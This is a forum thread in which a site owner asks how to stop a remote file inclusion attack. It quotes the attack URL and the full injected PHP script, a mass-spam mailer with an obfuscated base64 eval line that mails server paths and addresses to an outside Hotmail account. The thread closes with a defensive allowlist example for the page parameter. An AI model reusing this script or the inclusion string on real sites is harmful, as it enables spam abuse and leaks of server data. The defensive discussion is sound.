Hi - Hope someone can help. I have a site that is being hit with the script below invoked from the address bar with: /?page=http://snoopman.xm.com/good.txt? Is there a simple way to protect the site from such exploits? Cheers - Here's the script from good.txt:

<?php if(isset($_POST['action'] ) ){ $action=$_POST['action']; $message=$_POST['message']; $emaillist=$_POST['emaillist']; $from=$_POST['from']; $replyto=$_POST['replyto']; $subject=$_POST['subject']; $realname=$_POST['realname']; $file_name=$_POST['file']; $contenttype=$_POST['contenttype']; $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> <html> <head> <title>InboX Mass E-Mail By SNooP MaN</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- .style1 { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } --> </style> <style type="text/css"> <!-- .style1 { font-size: 20px; font-family: Geneva, Arial, Helvetica, sans-serif; } --> </style> </head> <body bgcolor="#000000" text="#00cc00"> <span class="style1">InboX Mass E-Mail By SNOOP MAN<br> </span> <form name="form1" method="post" action="" enctype="multipart/form-data"> <br> <table width="100%" border="0"> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Seu Email:</font></div> </td> <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="from" value="<? print $from; ?>" size="30"> </font></td> <td width="31%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Seu Nome:</font></div> </td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="realname" value="<?
print $realname; ?>" size="30"> </font></td> </tr> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Responder-Para:</font></div> </td> <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="replyto" value="<? print $replyto; ?>" size="30"> </font></td> <td width="31%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Anexar Arquivo:</font></div> </td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="file" name="file" size="30"> </font></td> </tr> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Assunto:</font></div> </td> <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="subject" value="<? print $subject; ?>" size="90"> </font></td> </tr> <tr valign="top"> <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="message" cols="50" rows="10"><? print $message; ?></textarea> <br> <input type="radio" name="contenttype" value="plain" > Plain Text <input name="contenttype" type="radio" value="html" checked> HTML <input type="hidden" name="action" value="send"> <input type="submit" value="Enviar eMails"> </font></td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> </font></td> </tr> </table> </form> <? 
if ($action){ if (!$from && !$subject && !$message && !$emaillist){ print "Por favor Preencha todos os campos antes de emitir sua mensagem."; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print " $to......."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "spammed<br>"; flush(); } } $ra44 = rand(1,99999); $subj98 = "sh-$ra44"; $a5 = $_SERVER['HTTP_REFERER']; $b33 = $_SERVER['DOCUMENT_ROOT']; $c87 = $_SERVER['REMOTE_ADDR']; $d23 = $_SERVER['SCRIPT_FILENAME']; $e09 = $_SERVER['SERVER_ADDR']; $f23 = $_SERVER['SERVER_SOFTWARE']; $g32 = $_SERVER['PATH_TRANSLATED']; $h65 = $_SERVER['PHP_SELF']; $message=$_POST['message']; $msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65"; echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7")); } ?> <style type="text/css"> <!-- .style1 { font-size: 10px; font-family: Geneva, Arial, Helvetica, sans-serif; } --> </style> <p class="style1"> Copyright © 2010 YahoozaY - irc.mildnet.org -j #xscan </p> <?php if(isset($_POST['action']) && $numemails 
!==0 ){echo "<script>alert('JaSi InBOX $numemails mail(s) ;One Time'); </script>";} ?> </body> </html>
Thanks for the quick responses. The script appears to create a form in some browsers (Firefox). I'm looking at the suggested .htaccess block right now - but that will not stop the script being invoked from elsewhere. Is there a simple way to stop the /?page=xxxxxx? from being parsed / read? Cheers
Actually, I was curious about what your script does, because it seemed to be processing the value passed in the page querystring var, e.g. ?page=url
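
The question above (how to stop `/?page=...` from being read) and the observation that the site's script processes the `page` querystring value both point at the same fix: never pass that value to `include`. The following is an added example, not code from the thread or from the poster's site; it assumes the site's index script includes a file chosen by `?page=`, and the page names, the `pages` directory and `resolve_page()` are hypothetical.

```php
<?php
// Added example; the thread never shows the site's own index script.
// Assumption: it does something like the line below, which lets a URL in
// ?page= be fetched and executed when allow_url_include is enabled:
//     include($_GET['page']);

// Hypothetical allowlist: public page name => local file under ./pages
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a requested page name to a local file, or null if not allowed.
 * The user-supplied value is only ever used as an array key, so it never
 * reaches the filesystem or a URL wrapper.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Rejects arrays (?page[]=x), URLs, ../ paths and unknown names alike.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or page file is missing
    }
    // Defence in depth: the resolved file must sit inside $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    // json_encode escapes control characters, so a crafted value cannot
    // forge extra lines in the error log.
    $raw = substr((string) json_encode($_GET['page'] ?? ''), 0, 200);
    error_log('rejected page parameter: ' . $raw);
    exit('Page not found');
}
include $file;
```

Independently of the code change, `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops `include` from fetching `http://` URLs at all.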